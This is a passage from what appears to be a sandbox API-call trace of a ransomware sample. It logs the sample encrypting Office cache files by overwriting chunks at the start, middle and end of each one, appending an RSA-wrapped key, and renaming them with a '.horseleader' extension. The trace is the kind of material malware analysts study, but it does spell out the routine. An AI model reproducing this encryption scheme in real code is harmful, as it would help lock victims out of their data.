out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe") returned 74 [0219.629] StrStrIW (lpFirst="ose.exe", lpSrch=".horseleader") returned 0x0 [0219.630] lstrcmpW (lpString1="ose.exe", lpString2="#Decrypt#.txt") returned 1 [0219.630] lstrcmpW (lpString1="ose.exe", lpString2="_uninstalling_.png") returned 1 [0219.630] lstrlenW (lpString=".testttjffg") returned 11 [0219.630] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe", lpSrch=".testttjffg") returned 0x0 [0219.630] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0219.630] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0219.630] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\ose.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0219.630] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe") returned 74 [0219.630] StrStrW (lpFirst="ose.exe", lpSrch=".txt") returned 0x0 [0219.630] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=174440) returned 1 [0219.630] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0219.630] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.650] SetFilePointerEx (in: hFile=0x21c, 
liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0219.650] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.651] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x12cb4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0219.651] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.672] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0219.672] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.672] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x25968, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0219.672] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.675] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0219.675] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.675] SetFilePointerEx (in: hFile=0x21c, 
liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0219.675] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0219.675] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0219.675] CloseHandle (hObject=0x21c) returned 1 [0219.676] GetProcessHeap () returned 0x780000 [0219.676] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0219.676] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe.horseleader") returned 86 [0219.676] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\ose.exe"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe.horseleader" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\ose.exe.horseleader")) returned 1 [0219.677] GetProcessHeap () returned 0x780000 [0219.677] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0219.677] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6644b620, ftCreationTime.dwHighDateTime=0x1cb04b2, ftLastAccessTime.dwLowDateTime=0x6644b620, ftLastAccessTime.dwHighDateTime=0x1cb04b2, ftLastWriteTime.dwLowDateTime=0xa81b8770, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x709768, dwReserved0=0xdded3805, 
dwReserved1=0xda7b4a6d, cFileName="osetup.dll", cAlternateFileName="")) returned 1 [0219.677] lstrcmpiW (lpString1="osetup.dll", lpString2="Windows") returned -1 [0219.677] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 77 [0219.677] StrStrIW (lpFirst="osetup.dll", lpSrch=".horseleader") returned 0x0 [0219.677] lstrcmpW (lpString1="osetup.dll", lpString2="#Decrypt#.txt") returned 1 [0219.677] lstrcmpW (lpString1="osetup.dll", lpString2="_uninstalling_.png") returned 1 [0219.677] lstrlenW (lpString=".testttjffg") returned 11 [0219.677] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll", lpSrch=".testttjffg") returned 0x0 [0219.677] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0219.677] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0219.677] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\osetup.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0219.678] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 77 [0219.678] StrStrW (lpFirst="osetup.dll", lpSrch=".txt") returned 0x0 [0219.678] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=7378792) returned 1 [0219.678] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0219.678] ReadFile (in: 
hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.680] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0219.680] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.681] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x3823b4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0219.681] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.683] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0219.683] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.683] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x704768, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0219.683] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.688] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0219.688] WriteFile (in: hFile=0x21c, 
lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.688] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0219.688] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0219.688] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0219.689] CloseHandle (hObject=0x21c) returned 1 [0219.689] GetProcessHeap () returned 0x780000 [0219.689] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0219.689] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll.horseleader") returned 89 [0219.689] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\osetup.dll"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll.horseleader" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\osetup.dll.horseleader")) returned 1 [0219.690] GetProcessHeap () returned 0x780000 [0219.690] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0219.690] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8238e540, 
ftCreationTime.dwHighDateTime=0x1cb147f, ftLastAccessTime.dwLowDateTime=0x8238e540, ftLastAccessTime.dwHighDateTime=0x1cb147f, ftLastWriteTime.dwLowDateTime=0xa5ddcc70, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x228df5c, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="OWOW32WW.cab", cAlternateFileName="")) returned 1 [0219.690] lstrcmpiW (lpString1="OWOW32WW.cab", lpString2="Windows") returned -1 [0219.690] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 79 [0219.690] StrStrIW (lpFirst="OWOW32WW.cab", lpSrch=".horseleader") returned 0x0 [0219.690] lstrcmpW (lpString1="OWOW32WW.cab", lpString2="#Decrypt#.txt") returned 1 [0219.690] lstrcmpW (lpString1="OWOW32WW.cab", lpString2="_uninstalling_.png") returned 1 [0219.690] lstrlenW (lpString=".testttjffg") returned 11 [0219.690] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab", lpSrch=".testttjffg") returned 0x0 [0219.690] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0219.690] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0219.690] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\owow32ww.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0219.691] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 79 [0219.691] StrStrW (lpFirst="OWOW32WW.cab", lpSrch=".txt") 
returned 0x0 [0219.691] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=36233052) returned 1 [0219.691] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0219.691] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.695] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0219.695] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.695] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x11447ae, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0219.695] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.700] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0219.700] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.700] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x2288f5c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0219.700] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: 
lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.795] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0219.795] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.795] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0219.795] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0219.795] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0219.796] CloseHandle (hObject=0x21c) returned 1 [0219.796] GetProcessHeap () returned 0x780000 [0219.796] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0219.796] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab.horseleader") returned 91 [0219.796] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\owow32ww.cab"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab.horseleader" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\owow32ww.cab.horseleader")) returned 1 [0219.797] GetProcessHeap () 
returned 0x780000 [0219.797] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0219.797] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7bd91af0, ftCreationTime.dwHighDateTime=0x1cb07b2, ftLastAccessTime.dwLowDateTime=0x7bd91af0, ftLastAccessTime.dwHighDateTime=0x1cb07b2, ftLastWriteTime.dwLowDateTime=0xa8bafbc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x165510, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="PidGenX.dll", cAlternateFileName="")) returned 1 [0219.797] lstrcmpiW (lpString1="PidGenX.dll", lpString2="Windows") returned -1 [0219.797] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 78 [0219.797] StrStrIW (lpFirst="PidGenX.dll", lpSrch=".horseleader") returned 0x0 [0219.797] lstrcmpW (lpString1="PidGenX.dll", lpString2="#Decrypt#.txt") returned 1 [0219.797] lstrcmpW (lpString1="PidGenX.dll", lpString2="_uninstalling_.png") returned 1 [0219.797] lstrlenW (lpString=".testttjffg") returned 11 [0219.797] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll", lpSrch=".testttjffg") returned 0x0 [0219.797] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0219.797] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0219.797] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pidgenx.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, 
dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0219.798] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 78 [0219.798] StrStrW (lpFirst="PidGenX.dll", lpSrch=".txt") returned 0x0 [0219.798] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=1463568) returned 1 [0219.798] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0219.798] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0220.133] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0220.133] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0220.155] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xb0288, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0220.176] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0220.442] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0220.442] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0220.443] 
SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x160510, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0220.443] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0220.461] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0220.461] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0220.462] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0220.462] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0220.462] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0220.462] CloseHandle (hObject=0x21c) returned 1 [0220.462] GetProcessHeap () returned 0x780000 [0220.462] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0220.462] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll.horseleader") returned 90 [0220.462] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll" (normalized: "c:\\msocache\\all 
